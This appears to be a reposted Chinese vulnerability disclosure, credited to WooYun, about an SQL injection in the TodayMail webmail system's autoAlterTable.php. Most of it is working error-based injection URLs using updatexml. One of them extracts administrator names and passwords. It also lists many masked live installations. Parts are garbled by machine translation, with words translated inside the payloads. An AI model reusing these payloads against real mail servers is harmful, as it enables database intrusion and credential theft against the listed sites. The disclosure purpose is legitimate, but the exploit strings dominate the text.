TodayMail邮件系统存在SQL注射漏洞

漏洞标题 TodayMail邮件系统存在SQL注射漏洞 相关厂商 广东时代互联科技有限公司 漏洞作者 路人甲 提交时间 2016-03-30 14:13 公开时间 2016-06-28 17:20 漏…

漏洞标题 TodayMail邮件系统中存在SQL注入漏洞 相关制造商 广东时代互联网科技有限公司 漏洞作者 过路人 提交时间 2016-03-30 14: 13 公共时间 2016-06-28 17: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 安全意识不足,PHP源代码审查 漏洞详细信息 使用量不多,下面的链接有漏洞 /mailcontrol/autoAlterTable.php 直接使用该漏洞 /mailcontrol/autoAlterTable.php?baseServer=**.**.**.**&database=todaymail&tableName=todaymail%20where%20updatexml%281,concat%280x23,version%28%29%29,1% 29 官方网站演示 0x1http://**。**。**。** http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,版本%28%29%29,1%29

0x2http://**。**。**。** http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,用户%28%29%29,1%29

0x3http://**。**。**。** http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,用户%28%29%29,1%29

获取管理员的帐户密码(官方网站演示) http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,%28%28select%20concat%28tm_name,0×23,tm_domain,0×23,tm_passwd%29%20from%20todaymail%20limit%200,1%29%29%29,1%29

其他现有案例,非常多,给定部分 http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php http://**。**。**。**/webmail/login.php **。**。**。** /网络邮件/login.php中 漏洞证明: 获取管理员的帐户密码(官方网站演示) http://**。**。**。**/mailcontrol/autoAlterTable.php?baseServer=**。**。**。**& database=todaymail& tableName=todaymail%20where%20updatexml%281,concat% 280x23,%28%28select%20concat%28tm_name,0×23,tm_domain,0×23,tm_passwd%29%20from%20todaymail%20limit%200,1%29%29%29,1%29

修理计划: 过滤 版权声明:请注明出处。居民A @乌云